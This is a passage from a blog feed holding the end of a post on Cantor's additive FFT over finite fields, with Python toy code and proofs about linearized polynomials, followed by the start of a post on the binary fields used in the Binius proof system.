&lt;p&gt;Despite these differences in specific generator relations, the underlying algebraic structure of these iterated quadratic extensions aligns with Cantor’s general framework for efficient basis representations and arithmetic.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;how-the-additive-fft-works-a-recursive-divide-and-conquer-strategy-for-polynomial-evaluation&quot;&gt;How the Additive FFT Works: A Recursive “Divide and Conquer” Strategy for Polynomial Evaluation&lt;&#x2F;h2&gt;
&lt;p&gt;The core mechanism of Cantor’s Additive FFT is a recursive “divide and conquer” process, mirroring the efficiency principles of a conventional FFT algorithm. Here we will first give a high-level overview for the problem of evaluating a polynomial $a$ of degree less than $n = p^m$ with coefficients in $F_p$. In the following, we’ll keep the notations used in the preceding sections.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Setting up the evaluation set: the subspaces $W_m$:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;1. The primary objective is to evaluate the polynomial $a(t)$ of degree less than $n = p^m$ at all the $p^m$ elements of $W_m$; in this sense, the subspace $W_m$ plays the role of the $n$-th roots of unity from the classical FFT algorithm.&lt;br &#x2F;&gt;
2. Crucially, $W_m$ can be partitioned into $p$ smaller, disjoint “cosets” of $W_{ m - 1}$. This allows for a hierarchical decomposition of the problem, just like in the classical setting when $n$ is a power of 2. More specifically, we know that $S$ is an $\mathbb{F_p}$-linear map that surjects $W_m$ onto $W_{ m - 1}$, and that this image has codimension 1. This ensures that there exists an element $u\in W_m$ such that&lt;br &#x2F;&gt;
$$W_m = \langle u\rangle \oplus W_{ m - 1}$$&lt;&#x2F;p&gt;
&lt;p&gt;since $\mathbb{F_p}$ has exactly $p$ elements then&lt;br &#x2F;&gt;
$$W_m = \bigcup\limits_{ \alpha\in\mathbb{F_p } } \left(\alpha\cdot u + W_{ m - 1}\right)$$&lt;&#x2F;p&gt;
&lt;p&gt;where this union is disjoint and each subset is simply a translate of $W_{m - 1}$. For simplicity, we’ll adopt the following notation:&lt;br &#x2F;&gt;
$$\alpha\cdot u + W_{ m - 1} = W_{ m - 1}^\alpha$$&lt;br &#x2F;&gt;
and observe that this set has exactly $p^{ m - 1}$ elements, since $W_{ m - 1}$ is the set of roots of $S_{ m - 1} (t)$, which has degree $p^{ m - 1}$.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;The Recursive Step: Breaking Down the Problem:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;1. Now, in order to evaluate $a(t)$ on $W_m$ it suffices to know the values of $a(t)$ at each of the cosets $W_{ m - 1 }^\alpha$. Since these cosets have $p^{ m - 1}$ elements, it would be ideal to reduce this problem to that of evaluating a polynomial $b_\alpha$ of &lt;em&gt;strictly smaller degree&lt;&#x2F;em&gt; than $\deg(a)$ on $W_{ m - 1}^\alpha$; ideally $\deg(b_\alpha ) &amp;lt; p^{ m - 1}$.&lt;br &#x2F;&gt;
2. In order to get hold of one such $b_\alpha$, the following observations come in handy:&lt;&#x2F;p&gt;
&lt;p&gt;a. $W_{ m - 1}$ is the set of roots of the $p^{ m - 1}$ degree polynomial $S_{ m - 1} (t)$&lt;br &#x2F;&gt;
b. a translate of this polynomial will vanish on $W_{ m - 1}^\alpha$:&lt;br &#x2F;&gt;
$$S_{ m - 1 }^\alpha (t) = S_{ m - 1}( t - \alpha\cdot u)$$&lt;br &#x2F;&gt;
don’t trust us, check it yourself.&lt;br &#x2F;&gt;
c. the polynomial division algorithm then guarantees that the remainder $b_\alpha$ of dividing $a$ by $S_{ m - 1}^\alpha$ is a polynomial of degree strictly less than $p^{ m - 1}$ and that&lt;br &#x2F;&gt;
$$a(t) = Q(t) S_{ m - 1}^\alpha (t) + b_\alpha (t)$$&lt;br &#x2F;&gt;
holds. In particular, whenever $w\in W_{ m - 1 }^\alpha$,&lt;&#x2F;p&gt;
&lt;p&gt;$$a(w) = Q(w)\cdot 0 + b_\alpha (w)$$&lt;&#x2F;p&gt;
&lt;p&gt;and this means $a\equiv b_\alpha$ on $W_{m-1}^\alpha$.&lt;&#x2F;p&gt;
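&lt;p&gt;This remainder trick is short enough to test directly. The sketch below (again in our toy $GF(16)$ model with reduction polynomial $X^4 + X + 1$, where $W_1 = \{0, 1\}$ and $u = 6$) reduces a degree-3 polynomial modulo $S_1 (t - u) = t^2 + t + 1$ and checks that the remainder agrees with the original polynomial on the coset $\{6, 7\}$:&lt;&#x2F;p&gt;

```python
MOD = 0b10011  # GF(16) = F_2[X]/(X^4 + X + 1)

def gmul(a, b):
    # carry-less multiplication in GF(16) mod X^4 + X + 1
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0b10000:
            a ^= MOD
        b >>= 1
    return r

def poly_eval(c, x):
    # Horner evaluation; coefficient lists are lowest degree first
    r = 0
    for coef in reversed(c):
        r = gmul(r, x) ^ coef
    return r

def poly_mod(a, d):
    # remainder of a by a monic divisor d over GF(16); subtraction is XOR
    a = a[:]
    dd = len(d) - 1
    for i in range(len(a) - 1, dd - 1, -1):
        c = a[i]
        if c:
            for j in range(dd + 1):
                a[i - dd + j] ^= gmul(c, d[j])
    return a[:dd]

# By linearity, S_1(t - u) = S_1(t) + S_1(u) = t^2 + t + 1 vanishes on {6, 7}.
a = [3, 5, 2, 9]              # a(t), degree 3, coefficients in GF(16)
b = poly_mod(a, [1, 1, 1])    # b_1 = a mod (t^2 + t + 1): degree < 2
assert all(poly_eval(a, w) == poly_eval(b, w) for w in (6, 7))
```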
&lt;p&gt;3. The algorithm then &lt;strong&gt;recursively calls itself&lt;&#x2F;strong&gt; to evaluate each $b_\alpha (t)$ on its corresponding smaller subspace $W_{ m - 1 }^\alpha$.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;The Base Case:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;1. This recursive decomposition continues until the polynomials $b_\alpha (t)$ reach a degree of 0, meaning they become constants.&lt;br &#x2F;&gt;
2. These resulting constants are the desired values of the original polynomial $a(t)$ at the points in $W_m$.&lt;&#x2F;p&gt;
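&lt;p&gt;Putting the pieces together, here is a minimal recursive sketch of the whole evaluation procedure for $p = 2$ and $m = 2$, in our toy $GF(16)$ model. The helper names, the basis choice $U = [1, 6]$ for $W_2 = \{0, 1, 6, 7\}$, and the dictionary output format are our own illustration choices, not Cantor’s notation. It uses the linearity of $S_{ m - 1}$ to build each translated divisor and recurses down to constants:&lt;&#x2F;p&gt;

```python
from math import comb

MOD = 0b10011  # GF(16) = F_2[X]/(X^4 + X + 1)

def gmul(a, b):
    # carry-less multiplication in GF(16) mod X^4 + X + 1
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0b10000:
            a ^= MOD
        b >>= 1
    return r

def poly_eval(c, x):
    # Horner evaluation; coefficient lists are lowest degree first
    r = 0
    for coef in reversed(c):
        r = gmul(r, x) ^ coef
    return r

def S_poly(m):
    # coefficients of S_m(t), the m-fold composition of t^2 + t:
    # S_m(t) = sum over i of (C(m, i) mod 2) * t^(2^i)
    c = [0] * (2 ** m + 1)
    for i in range(m + 1):
        if comb(m, i) % 2:
            c[2 ** i] = 1
    return c

def poly_mod(a, d):
    # remainder by a monic divisor; subtraction is XOR
    a = a[:]
    dd = len(d) - 1
    for i in range(len(a) - 1, dd - 1, -1):
        c = a[i]
        if c:
            for j in range(dd + 1):
                a[i - dd + j] ^= gmul(c, d[j])
    return a[:dd]

U = [1, 6]  # u spanning W_1 = {0, 1}, then the element extending it to W_2

def additive_fft(a, m, shift=0):
    # evaluate a(t) (deg < 2^m) on the coset shift + W_m; returns {point: value}
    if m == 0:
        return {shift: a[0] if a else 0}
    u, out = U[m - 1], {}
    Sm1 = S_poly(m - 1)
    for alpha in (0, 1):
        sh = shift ^ (u if alpha else 0)
        d = Sm1[:]
        d[0] ^= poly_eval(Sm1, sh)   # S_{m-1}(t - sh) = S_{m-1}(t) + S_{m-1}(sh)
        out.update(additive_fft(poly_mod(a, d), m - 1, sh))
    return out

a = [3, 5, 2, 9]                     # degree-3 polynomial over GF(16)
vals = additive_fft(a, 2)
assert vals == {w: poly_eval(a, w) for w in (0, 1, 6, 7)}
```

&lt;p&gt;For larger $m$ the same code works once the basis list $U$ is extended with further elements $u_k$ satisfying $S(u_k ) = u_{ k - 1}$.&lt;&#x2F;p&gt;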
&lt;h3 id=&quot;the-reverse-process-interpolation&quot;&gt;The Reverse Process: Interpolation&lt;&#x2F;h3&gt;
&lt;p&gt;Cantor also outlines the inverse operation, known as &lt;strong&gt;interpolation&lt;&#x2F;strong&gt;. If the values of a polynomial are known for all points within $W_m$, one can reverse the steps of the Additive FFT algorithm to reconstruct the coefficients of the original polynomial. This inverse process involves similar division and summation techniques, executed in reverse order.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;computational-cost-and-efficiency&quot;&gt;Computational Cost and Efficiency&lt;&#x2F;h3&gt;
&lt;p&gt;Cantor rigorously analyzes the computational complexity of his algorithm, categorizing operations into two types:&lt;br &#x2F;&gt;
- &lt;strong&gt;A-operations (Addition-like):&lt;&#x2F;strong&gt; These operations have a computational cost comparable to additions within the underlying field $F$.&lt;br &#x2F;&gt;
- &lt;strong&gt;M-operations (Multiplication-like):&lt;&#x2F;strong&gt; These operations have a computational cost comparable to multiplications within the underlying field $F$.&lt;&#x2F;p&gt;
&lt;p&gt;For evaluating a polynomial of degree $&amp;lt;n = p^m$ at all points of $W_m$:&lt;br &#x2F;&gt;
1. The total number of A-operations is approximately $O(n (\log n)^{ 1 + \log_p ((p + 1) &#x2F;2) })$. For $p = 2$, this simplifies to roughly $O(n (\log n)^{ 1.585 })$.&lt;br &#x2F;&gt;
2. The total number of M-operations is approximately $O(n \log n)$.&lt;&#x2F;p&gt;
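&lt;p&gt;The exponent in the A-operation bound is a one-liner to evaluate; the following sketch just checks the $p = 2$ figure quoted above:&lt;&#x2F;p&gt;

```python
from math import log

def a_op_exponent(p):
    # exponent of the log factor in the A-operation count: 1 + log_p((p + 1) / 2)
    return 1 + log((p + 1) / 2, p)

# for p = 2: 1 + log_2(3/2) = 1.5849..., the 1.585 figure quoted above
assert abs(a_op_exponent(2) - 1.585) < 0.001
```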
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;In summary, vector subspaces are the “domains” over which the Additive FFT operates. The algorithm recursively divides them and uses the linear properties of linearized polynomials (and the Frobenius automorphism) to relate evaluations across different subspaces, allowing for efficient multipoint evaluation and interpolation.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;appendix-proofs-and-ideas&quot;&gt;Appendix - Proofs and ideas&lt;&#x2F;h2&gt;
&lt;p&gt;Here we sum up most of the proofs, definitions and technicalities around linearized polynomials that are mentioned throughout the text. We begin by the first definitions and deduce some of the properties employed.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Definition (Linearized polynomial)&lt;&#x2F;strong&gt; A linearized polynomial over a finite field $F_q$ has the general form:&lt;br &#x2F;&gt;
$$L(x) = \sum_{ i = 0 }^d a_i x^{ q^i }$$&lt;br &#x2F;&gt;
where $a_i \in F_q$&lt;&#x2F;p&gt;
&lt;p&gt;Here we collect some of their main properties as an itemized list; most of these are easily provable facts and could serve as encouraging exercises (and also a reminder of how important basic linear algebra really is):&lt;br &#x2F;&gt;
- &lt;strong&gt;They are Linear Transformations:&lt;&#x2F;strong&gt; If $L(x)$ is a linearized polynomial with coefficients in $F_q$, the mapping $x \mapsto L(x)$ is a &lt;strong&gt;linear transformation&lt;&#x2F;strong&gt; from $F_{ q^n }$ to itself, considering this extension as an $n$-dimensional vector space over $F_q$. This means that for any $u, v \in F_{ q^n }$ and $c \in F_q$:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$L(u + v) = L(u) + L(v)$&lt;&#x2F;li&gt;
&lt;li&gt;$L(cu) = cL(u)$&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;(This property stems from the characterization of the field of $q$ elements as the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Splitting_field&quot;&gt;splitting field&lt;&#x2F;a&gt; of the polynomial $X^{q} - X$.) Since $L$ is a linear map, the set of its roots &lt;strong&gt;forms a vector space over $\mathbb{F_q}$&lt;&#x2F;strong&gt;:&lt;&#x2F;p&gt;
&lt;p&gt;$$Ker(L) = \{v\in\mathbb{F_{ q^n }} : L(v) = 0 \} \subset \mathbb{F_{ q^n }}$$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;The uncanny effects of composition:&lt;&#x2F;strong&gt; Usually, composition of polynomials produces a new polynomial and not much else can be said in the general setting. But since linearized polynomials can be seen as linear maps, there are some astonishing consequences:&lt;&#x2F;p&gt;
&lt;p&gt;1. Right from their definition, linearized polynomials can be viewed as ordinary polynomials pre-composed with $x^q$. That is, there’s a correspondence between linearized polynomials over $F_q$ and “ordinary” polynomials in $F_q [x]$. To a linearized polynomial $L(x) = \sum_{ i = 0 }^d a_i x^{ q^i }$, we associate a “$q$-conventional” polynomial $\ell(y) = \sum_{ i = 0}^d a_i y^i$.&lt;br &#x2F;&gt;
2. Also from their definition and the linearity property, we see that the composition of two linearized polynomials is again a linearized polynomial. This binary operation is non-commutative but distributive with respect to polynomial addition.&lt;br &#x2F;&gt;
3. If we interpret composition as a non-commutative multiplication, then an analogue of division can be devised: we say that $L$ &lt;em&gt;symbolically divides&lt;&#x2F;em&gt; $M$ if there exists a linearized polynomial $N$ such that
$$M(X) = (L\circ N)(X)$$
4. Not only this, but there’s also a very remarkable link between linearized polynomials, symbolic divisibility and their $q$-conventionals: $L(x)$ symbolically divides $M(x)$ if and only if $\ell(y)$ divides $m(y)$ in the ordinary sense.&lt;br &#x2F;&gt;
5. A linearized polynomial $L(x)$ is compositionally irreducible if and only if its associated $q$-conventional polynomial $\ell(y)$ is irreducible over $F_q$. It’s important to note that a compositionally irreducible linearized polynomial is &lt;em&gt;always&lt;&#x2F;em&gt; reducible in the ordinary sense (it has the factor $x$).&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Regarding the construction of towers of extensions,&lt;&#x2F;strong&gt; successive compositions of the linearized polynomial $S(t) = t^p - t$ with itself&lt;&#x2F;p&gt;
&lt;p&gt;$$S_{m} (t) = S\circ S\circ\cdots\circ S (t) = S(S_{ m - 1} (t))$$&lt;&#x2F;p&gt;
&lt;p&gt;yield the subsets on which the algorithm is defined. From the general theory of linear maps we know that whenever the composition $F\circ G$ of linear maps $F,G$ is possible, then&lt;&#x2F;p&gt;
&lt;p&gt;$$Ker(G)\subset Ker(F\circ G);$$&lt;&#x2F;p&gt;
&lt;p&gt;in our context this gives an incidence relation between the corresponding kernels: $$Ker(S_{ m - 1 })\subset Ker(S\circ S_{ m - 1 }) = Ker(S_m)$$&lt;&#x2F;p&gt;
&lt;p&gt;This is, $W_{ m - 1} \subset W_m$. From this relation we also see that $S(W_m )\subset W_{ m - 1 }$ since&lt;&#x2F;p&gt;
&lt;p&gt;$$S_{ m - 1 }(S(W_m ))=S_m (W_m ) = 0$$&lt;&#x2F;p&gt;
&lt;p&gt;So we can consider the restriction of $S$ to $W_m$ and look at it as an &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Endomorphism&quot;&gt;endomorphism&lt;&#x2F;a&gt; $S : W_m\rightarrow W_m$. The incidence relation and the dimension theorem for linear maps yields&lt;&#x2F;p&gt;
&lt;p&gt;$$\dim(W_{ m - 1 }) \leq \dim(W_m ) = \dim(Ker(S)) + \dim(S( W_m )) \leq 1 + \dim(W_{ m - 1})$$&lt;&#x2F;p&gt;
&lt;p&gt;Since $S_{ m - 1}$ and $S_m$ are separable (their derivative is a nonzero constant) and have different degrees, they have different numbers of distinct roots in $\tilde{F}$, so their kernels as linear maps are different. This implies&lt;&#x2F;p&gt;
&lt;p&gt;$$W_{ m - 1}\neq W_m \implies \dim(W_m) = 1 + \dim(W_{ m - 1})$$&lt;&#x2F;p&gt;
&lt;p&gt;and since $\dim(W_1) = 1$ we have as conclusions that $\dim(W_m ) = m$ and that $S$ surjects $W_m$ onto $W_{ m - 1}$.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;cantor-s-basis-theorem&quot;&gt;Cantor’s basis theorem&lt;&#x2F;h3&gt;
&lt;p&gt;One of the pillars of Cantor’s contributions is what in his paper is coined as “Theorem 1.1”, in which he proves that a certain set is a basis over $\mathbb{F}_p$ of its algebraic closure. In order to state the theorem, we need to make the following observations. Fix your favourite prime $p$ and consider the collection of $u_j \in\tilde{F}$ defined by $S$ in the following fashion:&lt;&#x2F;p&gt;
&lt;p&gt;$$S(u_j ) = u_{ j - 1 },\quad u_j \in W_{ j +1 } - W_j$$&lt;br &#x2F;&gt;
Then&lt;br &#x2F;&gt;
a. each positive integer $m$ has an expansion in base $p$: this is, there exist a non-negative integer $k$ and integers $0\leq m_i \leq p - 1$ with $0\leq i\leq k$ such that&lt;br &#x2F;&gt;
$$m = \sum\limits_{ i = 0}^k m_i p^i \quad\text{with }\quad m_k\neq 0$$&lt;&#x2F;p&gt;
&lt;p&gt;To symbolize this, we write $E(m) = [m_0 m_1 \cdots m_k ]$ and we may think of this vector of exponents as the image of $m$ through an “expansion map”&lt;br &#x2F;&gt;
b. Let $\gamma_m$ be the first nonzero entry of $E(m)$.&lt;br &#x2F;&gt;
c. Set $y_0 = 1$ and for positive $m$, define&lt;br &#x2F;&gt;
$$y_m = \textbf{u}^{ E(m) } = u_0^{ m_0 }\cdot u_1^{ m_1 }\cdots u_k^{ m_k }$$&lt;br &#x2F;&gt;
and observe that in particular&lt;br &#x2F;&gt;
$$y_{ p^r } = u_r$$&lt;&#x2F;p&gt;
&lt;p&gt;It turns out that the collection $\{y_0, y_1, \ldots \}$ has &lt;em&gt;very nice&lt;&#x2F;em&gt; properties, that come summarized in the following theorem&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Theorem (Cantor’s Theorem 1.1):&lt;&#x2F;strong&gt; In the same context as the discussion above,&lt;br &#x2F;&gt;
1. $\{y_0 , y_1 ,\ldots y_m \}$ is a basis for $W_{ m + 1}$ and $y_m \in W_{ m + 1} - W_m$.&lt;br &#x2F;&gt;
2. When $m\geq 1$, then&lt;br &#x2F;&gt;
$$S(y_m ) - \gamma_m y_{ m - 1} \in W_{ m - 1}$$&lt;br &#x2F;&gt;
3. the full collection $\{y_0 , y_1 , \ldots \}$ is a basis for $\tilde{F}$.&lt;&#x2F;p&gt;
&lt;p&gt;This specific basis is important for theoretical purposes, but it may also be convenient to consider bases for $W_m$ with nice properties with respect to $S$; we have already encountered one such basis, the one defined by the $u$’s. Set&lt;&#x2F;p&gt;
&lt;p&gt;$$\mathcal{U_m} = \{u_0 ,u_1 ,\ldots, u_{ m - 1} \}$$&lt;&#x2F;p&gt;
&lt;p&gt;as a basis for $W_m$. Now for each $x\in W_m$ there exist unique $\alpha_i \in\mathbb{F_p}$ such that&lt;&#x2F;p&gt;
&lt;p&gt;$$x = \sum\limits_{ i = 0 }^{ m - 1 } \alpha_i u_i$$&lt;&#x2F;p&gt;
&lt;p&gt;By considering $0\leq \alpha_i \leq p - 1$, we obtain a “replacement map” that is able to interpret $x$ as an integer, by&lt;&#x2F;p&gt;
&lt;p&gt;$$x\in W_m \longmapsto R(x) = \sum\limits_{ i = 0}^{ m - 1} \alpha_i p^i\in [0, p^m - 1]$$&lt;&#x2F;p&gt;
&lt;p&gt;An attentive reader will notice that this map is the inverse of the “expansion map” that appeared earlier. One good property of this particular choice of basis is that&lt;&#x2F;p&gt;
&lt;p&gt;$$\alpha = R(x)\implies \lfloor \alpha &#x2F;p \rfloor = R(S(x))$$&lt;&#x2F;p&gt;
&lt;p&gt;This fact will come in handy when the time to describe the FFT algorithm comes.&lt;&#x2F;p&gt;
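&lt;p&gt;The interplay between $R$ and $S$ can be checked in a running toy example: for $p = 2$ and $W_2 = \{0, 1, 6, 7\}$ inside $GF(16)$ (encoded as $\mathbb{F_2}[X]&#x2F;\langle X^4 + X + 1\rangle$, with basis $u_0 = 1$, $u_1 = 6$; both the encoding and the helper names below are our own choices), applying $S$ corresponds exactly to an integer halving of $R(x)$:&lt;&#x2F;p&gt;

```python
MOD = 0b10011  # GF(16) = F_2[X]/(X^4 + X + 1)

def gmul(a, b):
    # carry-less multiplication in GF(16) mod X^4 + X + 1
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0b10000:
            a ^= MOD
        b >>= 1
    return r

def S(x):                 # S(t) = t^2 + t
    return gmul(x, x) ^ x

U = [1, 6]                # basis u_0 = 1, u_1 = 6 of W_2 = {0, 1, 6, 7}

def R(x):
    # write x = sum_i alpha_i * u_i with alpha_i in F_2, return sum_i alpha_i * 2^i
    for r in range(4):
        v = 0
        for i in range(2):
            if (r >> i) & 1:
                v ^= U[i]
        if v == x:
            return r
    raise ValueError("x is not in W_2")

# the replacement map intertwines S with integer halving
assert all(R(S(x)) == R(x) // 2 for x in (0, 1, 6, 7))
```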
</description>
      </item>
      <item>
          <title>The fields powering Binius</title>
          <pubDate>Thu, 12 Jun 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/the-fields-powering-binius/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/the-fields-powering-binius/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/the-fields-powering-binius/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;The development of general-purpose zkVMs has made writing verifiable applications easier, by allowing developers to write high-level code, compile it to RISC-V or another instruction set architecture (ISA), and run it on top of the virtual machine. The virtual machine then generates a succinct proof of execution using a proof system, such as STARKs or Groth16. Recent advances in proof systems have made it possible to reduce proving times, and we are heading towards real-time proving of Ethereum blocks. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.binius.xyz&#x2F;&quot;&gt;Binius&lt;&#x2F;a&gt; is a proof system that was developed focusing on how to create a technology that is hardware-friendly. Knowing how hardware works, a tailored proof system with really fast mathematics can yield significant improvements. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;PetraProver&#x2F;PetraVM&quot;&gt;Petra&lt;&#x2F;a&gt; is the first virtual machine to leverage Binius. What makes Binius special and how does it work?&lt;&#x2F;p&gt;
&lt;p&gt;In this article we will review the basic mathematics behind the Binius protocol, which exploits the boolean hypercube $\mathcal{B_\ell} = \{0 , 1 \}^\ell$. We’ll concentrate on an elementary description of binary towers and the representation of field elements, as well as addition and multiplication of field elements exploiting their natural relation with circuit-level operations. Throughout this article, we will cover some of the ground material from which binary towers emerged and came to life as a technologically interesting object, namely:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Diamond and Posen’s work from 2023, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;1784&quot;&gt;“Succinct Arguments over Towers of Binary Fields”&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;David Cantor’s seminal 1989 paper &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.sciencedirect.com&#x2F;science&#x2F;article&#x2F;pii&#x2F;0097316589900204&quot;&gt;“On Arithmetical Algorithms over Finite Fields”&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;Wiedemann’s 1987 article &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.fq.math.ca&#x2F;Scanned&#x2F;26-4&#x2F;wiedemann.pdf&quot;&gt;“An Iterated Quadratic Extension of GF(2)”&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;For more background material, see our &lt;a href=&quot;&#x2F;snarks-on-binary-fields-binius&#x2F;&quot;&gt;previous post on Binius part 1&lt;&#x2F;a&gt; and &lt;a href=&quot;&#x2F;binius-part-2&#x2F;&quot;&gt;Binius part 2&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;field-extensions-and-representation-of-field-elements&quot;&gt;Field extensions and representation of field elements&lt;&#x2F;h2&gt;
&lt;p&gt;In the following discussion, we will fix $\mathbb{F_2} = \{0,1\}$ as the field with two elements. Finite field extensions of degree $d$ of this field can be characterized as the quotient ring&lt;&#x2F;p&gt;
&lt;p&gt;$$\mathbb{F}_{q} \equiv \mathbb{F_2}[X]&#x2F;\langle f(X)\rangle$$&lt;&#x2F;p&gt;
&lt;p&gt;where $f$ is any irreducible polynomial $f \in \mathbb{F_2} [X]$ of degree $d$: this field has exactly $q = 2^d$ elements and consists of all the remainders of polynomial division by $f$. In other words, it consists of polynomials of degree at most $d - 1$ with coefficients in $\mathbb{F_2}$. Also, this extension can be viewed as a vector space of dimension $d$ over the base field $\mathbb{F_2}$ which is a very nice feature. The collection&lt;&#x2F;p&gt;
&lt;p&gt;$$B_q = \{1 , X , X^2 ,\ldots, X^{d - 1} \}$$&lt;&#x2F;p&gt;
&lt;p&gt;is commonly called “the monomial basis”, and upon fixing this basis, an isomorphism identifying such a polynomial with its $\mathbb{F_2}$ coordinates is established. Addition and multiplication of field elements, when viewed as polynomials, are performed modulo $f$.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;example&quot;&gt;Example&lt;&#x2F;h3&gt;
&lt;p&gt;Consider the polynomial $$f(X) = X^2 + X + 1$$ as an element in $\mathbb{F_2} [X]$. This $f$ is irreducible: if it had a non-trivial factor $g$, then $\deg(g) = 1$, and since $g \in \mathbb{F_2} [X]$, a root of $g$ would also be a root of $f$. Since $f$ has no roots in the base field, we conclude that $f$ is irreducible and&lt;&#x2F;p&gt;
&lt;p&gt;$$\mathbb{F_2}[X]&#x2F;\langle X^2+X+1\rangle $$&lt;&#x2F;p&gt;
&lt;p&gt;is indeed a degree 2 extension of $\mathbb{F_2}$; this means that it can be considered as a dimension 2 vector space over the base field. The canonical basis for this vector space is then&lt;&#x2F;p&gt;
&lt;p&gt;$$B_2 = \{1 , X \}$$&lt;&#x2F;p&gt;
&lt;p&gt;and all its elements can be listed as linear combinations of elements of $B_2$:&lt;&#x2F;p&gt;
&lt;p&gt;$$\mathbb{F_4} = \{0 , 1 , X , 1 + X \}$$&lt;&#x2F;p&gt;
&lt;p&gt;The coordinate representation of $\mathbb{F_4}$ over $\mathbb{F_2}$ can be viewed in the following table&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Polynomial Representation&lt;&#x2F;th&gt;&lt;th&gt;Coordinate Representation&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;$0$&lt;&#x2F;td&gt;&lt;td&gt;$(0, 0)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$1$&lt;&#x2F;td&gt;&lt;td&gt;$(1, 0)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$X$&lt;&#x2F;td&gt;&lt;td&gt;$(0, 1)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$1 + X$&lt;&#x2F;td&gt;&lt;td&gt;$(1, 1)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;The field operations in the extensions are ring operations in $\mathbb{F_2} [X]$ taken to the quotient field by considering the non-trivial relation $X^2 + X + 1 = 0 \iff X^2 = 1 + X$. &lt;strong&gt;This is sometimes interpreted in a straightforward manner: now $X$ becomes a root of $f$ in the field extension $\mathbb{F_4}$&lt;&#x2F;strong&gt;.&lt;&#x2F;p&gt;
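&lt;p&gt;To make the mechanics concrete, here is a minimal Python sketch of multiplication in $\mathbb{F_4}$ using the relation $X^2 = 1 + X$ (the 2-bit integer encoding and the name &lt;code&gt;f4_mul&lt;&#x2F;code&gt; are our own illustrative choices, not from any particular library):&lt;&#x2F;p&gt;

```python
# F4 = F2[X]/(X^2 + X + 1); an element a0 + a1*X is encoded as the
# 2-bit integer a0 + 2*a1 (our encoding choice).
def f4_mul(a, b):
    a0, a1 = a % 2, a >> 1
    b0, b1 = b % 2, b >> 1
    # schoolbook product (a0 + a1 X)(b0 + b1 X) over F2
    c0 = a0 * b0
    c1 = (a0 * b1) ^ (a1 * b0)
    c2 = a1 * b1               # coefficient of X^2
    # reduce using the relation X^2 = 1 + X
    return (c0 ^ c2) + 2 * (c1 ^ c2)

# X * X = 1 + X, X * (1 + X) = 1, (1 + X)^2 = X
assert f4_mul(0b10, 0b10) == 0b11
assert f4_mul(0b10, 0b11) == 0b01
assert f4_mul(0b11, 0b11) == 0b10
```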
&lt;hr &#x2F;&gt;
&lt;p&gt;We observe that establishing the irreducibility of $f$ in the last example was simple since the degree of $f$ was low enough: if $2 \leq \deg(f) \leq 3$ then $f$ is irreducible over $\mathbb{F}$ $\iff$ $f$ has no roots in $\mathbb{F}$ (this is a theorem in the theory of fields).&lt;&#x2F;p&gt;
